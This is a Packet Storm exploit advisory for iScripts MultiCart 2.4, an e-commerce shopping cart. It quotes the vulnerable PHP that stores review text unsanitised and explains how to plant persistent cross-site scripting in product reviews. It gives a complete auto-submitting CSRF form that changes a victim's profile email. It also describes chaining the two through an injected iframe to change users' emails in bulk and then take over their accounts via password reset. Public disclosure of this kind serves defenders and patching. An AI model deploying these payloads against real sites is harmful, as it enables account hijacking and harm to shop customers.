what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

iScripts MultiCart 2.4 Cross Site Request Forgery / Cross Site Scripting

iScripts MultiCart 2.4 Cross Site Request Forgery / Cross Site Scripting
Posted Dec 14, 2013
Authored by Saadat Ullah

iScripts MultiCart versions 2.4 and below suffer from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 8116f2279a10f7bdb72b6df08d209697707902f047a882d86a524e3a509ac792

iScripts MultiCart 2.4 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
# Exploit Title  : iScripts MultiCart <=  2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover
# Date : 2013/12/14
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link : http://www.iscripts.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

# Cross-site Scripting

iScript MultiCart is an paid shoping cart system , suffers from XSS and Cross-site request forgery vulnerability through which
attacker can manipulate user data via sending him malicious craft url.

XSS in product Review , so alot exploitation can be done as inject code will be execute whenever a product is visited by clients.
In Product_review.php line 52--- Persistent XSS

mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."',

'".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error());

$_POST['txtReview'] is inserted without sanitizing.

Exploitation

Goto http://site.tld/product_review.php?pid=[any product id]
Paste your xss vector and submit.

XSS vector will be executed here
http://site.tld/productdetails.php?productid=1 -->same product id for which you submited the review.

# Cross-site request forgery
<html>
<body onload="javascript:document.forms[0].submit()">
<form name="ex"action="http://localhost/profile.php" method=post >


<input type=hidden size=30 maxlength=30 name=userid value="5">

<input type=hidden size=30 maxlength=30 name=txtFirstName value="admin">

<input type=hidden size=30 maxlength=100 name=txtLastName value="admin">


<input type=hidden size=30 maxlength=30 name=txtEmail value="admin@gmail.com">

<input type=hidden size=30 maxlength=30 name=txtAddress1 value="asdf">
<input type=hidden size=30 maxlength=30 name=txtCity value="saf">
<input type=hidden size=30 maxlength=30 name=bill_country value="DZ">
<input type=hidden size=30 maxlength=30 name=bill_state value="adsf">

<input type=hidden size=30 maxlength=250 name=btnSaveChanges value="Save Changes">
<input type=submit name=btnSaveChanges class=button value='Save'>
</form>
</html>

# XSS+CSRF Mass Email Change /Mass Account Takeover

XSS+CSRF can be used to change mass user email , after changing the email we can change the password too via
forget password option and providing email.
Just inject a CSRF iframe as XSS vector on product_review.php
E.g
<iframe src="http://www.site.tld/inject.html"></iframe>
Inject.html ---> CRSF exploit

So now whenever user browse different products their useremail will be changed automatically.

#Independent Pakistani Security Researcher
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close